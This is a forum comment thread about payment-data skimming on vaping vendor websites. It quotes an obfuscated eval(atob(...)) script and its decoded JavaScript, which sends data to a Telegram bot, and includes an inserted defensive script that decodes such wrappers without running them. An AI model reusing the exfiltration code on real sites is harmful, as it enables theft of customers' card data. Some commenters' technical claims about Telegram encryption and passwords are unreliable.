Every few months there is an attack to steal information. Don't know what they're doing.
Information is power. Stealing information is stealing power. Seems obvious enough.
Might be a ploy. Not saying it is for sure. Though, having media run stories about vaping vendors being compromised might be a way to interrupt legitimate business.
"Oh no, all our favorite vaping vendors are compromised. They get the pay data stolen. Whatever are we to do? Boycott the vaping vendors! Run for your lives!"
That would effectively fold up vendors that may be small businesses yet are highly credible. If they're not getting business, well, they've got no choice but to close up shop. Again, not saying this is absolutely the case; saying, though, I could see how it might feasibly be so.
This should tell you enough: "eval(atob("IHZhciB4ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICB4Lm9wZW4oIlBPU1QiLCAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCIrdGJvdCsiL3NlbmRNZXNzYWdlIiwgdHJ1ZSk7CiAgICB4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsICdhcHBsaWNhdGlvbi9qc29uOyBjaGFyc2V0PXV0Zi04Jyk7CiAgICB4LndpdGhDcmVkZW50aWFscyA9IGZhbHNlOwp2YXIgZGQgPSBKU09OLnN0cmluZ2lmeSh7IAogICAgY2hhdF9pZDogdGNoYXQsCiAgICB0ZXh0OiB0bWVzc2FnZQogfSk7CiAgICB4LnNlbmQoZGQpOw=="));"
decoded: var x = new XMLHttpRequest(); x.open("POST", "https://api . telegram . org/bot"+tbot+"/sendMessage", true); x.setRequestHeader('Content-Type', 'application/json; charset=utf-8'); x.withCredentials = false; var dd = JSON.stringify({ chat_id: tchat, text: tmessage }); x.send(dd);
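Added example, not part of any comment in this thread: a static triage of the eval(atob(...)) wrapper quoted above, which decodes the Base64 layer without ever executing it and reports what the decoded text references. The sample page, the function names and the indicator list are constructed for illustration, and the code also follows nested wrappers, which goes beyond the single layer shown in the thread.

```javascript
// Static triage for eval(atob("...")) wrappers: decode each layer, never run it.
// Group 1 is the quote character, group 2 the Base64 body.
const WRAPPER = /eval\s*\(\s*atob\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)/g;

// What to flag in decoded text. The Telegram Bot API host is taken from the
// decoded snippet in the thread; the other two entries are assumptions.
const INDICATORS = [
  { name: "telegram-bot-api", re: /api\s*\.\s*telegram\s*\.\s*org\/bot/i },
  { name: "xhr-post", re: /\.open\(\s*["']POST["']/i },
  { name: "nested-eval", re: /\beval\s*\(/ },
];

function decodeLayer(b64) {
  return Buffer.from(b64.replace(/\s+/g, ""), "base64").toString("utf8");
}

// Returns one finding per decoded layer: its depth, the plaintext, and the
// indicators it matched. maxDepth bounds how many nested layers are unwrapped.
function triage(source, maxDepth = 5) {
  const findings = [];
  const queue = [{ text: source, depth: 0 }];
  while (queue.length) {
    const { text, depth } = queue.shift();
    for (const m of text.matchAll(WRAPPER)) {
      const decoded = decodeLayer(m[2]);
      const hits = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
      findings.push({ depth: depth + 1, decoded, hits });
      if (depth + 1 < maxDepth) queue.push({ text: decoded, depth: depth + 1 });
    }
  }
  return findings;
}

// Constructed sample: a fragment shaped like the decoded snippet, wrapped twice.
const inner = 'var x = new XMLHttpRequest(); x.open("POST", ' +
  '"https://api.telegram.org/bot"+tbot+"/sendMessage", true);';
const wrap = (js) => 'eval(atob("' + Buffer.from(js, "utf8").toString("base64") + '"));';
const SAMPLE_PAGE = "<script>" + wrap(wrap(inner)) + "</script><script>var ok = 1;</script>";

for (const f of triage(SAMPLE_PAGE)) {
  console.log("layer " + f.depth + ": " + (f.hits.join(", ") || "no indicators"));
}
```

A hit only says that the decoded text posts to the Telegram Bot API; whether the script belongs on the page is still a question for whoever owns the site's code.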
No, it really doesn't, as there's a lack of context. Is this script an actual valid call to perhaps a legitimate manner of processing payment data? Can see it parses the data out as a text message for a Telegram app chat bot.
Telegram chat is end-to-end encrypted by default. Unlikely there would be a man-in-the-middle attack. It usually uses an OTP (One Time Password/Passphrase) to run such global variables. So finding a salt key for the hash would be very highly difficult, and take far too long to be of benefit.
Does this Telegram bot log all transactions for someone? What is the intention/s here? What is the motive/s?
There's none of this discussed, simply "oh, well, there's scripts on sites." Yes, modern sites now routinely use scripts. Where have you been for the last thirty years? And yes, I know there are malicious actors and malicious scripts. My point here is we're not being given all the information, all the context. We cannot determine jack.
"This site uses scripts."
"Um, okay? And, ...?"
A lot can be done and be valid, legitimate, above board. Merely because you see a site using a script/s does not imply nefarious intent. All that is masked and not presented. There's a "slant" being pushed. "Oh fear, gloom and doom."
Again I'm not saying all that's going on is legit. Nor am I saying for sure someone is running disinformation with this article. I am saying we ought to ask for further context. We ought to think for ourselves, and think critically.
If indeed this is nefarious or malicious, is there evidence of it, where? Can the public see please?
If not, well, then quit fearmongering.
Read the article. Appears that someone inside might have added code. If not, then someone injected code from outside. The point is then that the site has been cracked. I would figure the site uses algorithms to protect financial data.
The access control list for that would be very limited. You might have a developer with access, a finance person. Point being that access would be restricted.
Could someone inject something? Possibly, but they would first need to garner root access. That is even further restricted. The hosting company might have access, and a site administrator.
It's not unlikely a pass was cracked. It could happen. Still one would think such access would be better protected.